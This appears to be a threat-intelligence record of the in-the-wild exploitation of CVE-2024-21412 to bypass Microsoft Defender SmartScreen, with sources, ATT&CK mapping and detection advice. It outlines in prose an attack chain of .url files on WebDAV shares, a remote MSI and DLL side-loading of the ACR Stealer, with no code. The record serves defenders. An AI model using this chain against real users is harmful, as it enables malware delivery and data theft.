Bypass Record

DLL Side-Loading × Microsoft Defender SmartScreen

A publicly-reported instance of DLL Side-Loading bypassing Microsoft Defender SmartScreen, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Microsoft Defender SmartScreen

Technique

DLL Side-Loading

MITRE ATT&CK

T1574.002

Confidence

High

Severity

Critical

Status

in the wild

Disclosed

2024-03-13

Config / version noted

Not stated

Provenance

cybersecsentinel.com
disclosed 2024-07-25 · original source · via raw
www.trendmicro.com
disclosed 2024-03-13 · original source · via raw

Reported as

exploiting CVE-2024-21412 to bypass Microsoft Defender SmartScreen

Mechanism

The attack exploits CVE-2024-21412 by using internet shortcut (.url) files hosted on WebDAV shares. When a user clicks a phishing link, the .url file points to a malicious MSI installer on a remote server. SmartScreen fails to properly validate the source, allowing the MSI to execute. The MSI then performs DLL sideloading to decrypt and run the ACR Stealer payload, which employs anti-analysis techniques like XOR encoding and obfuscation.

Detection & mitigation

Monitor for execution of MSI files from unusual network locations, especially WebDAV shares. Detect DLL sideloading by looking for unsigned DLLs loaded from non-standard paths. Apply CVE-2024-21412 patch and enforce SmartScreen via GPO.

DLL Side-Loading has also been recorded against

eScan ESET McAfee SentinelOne Xcitium Zabbix

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.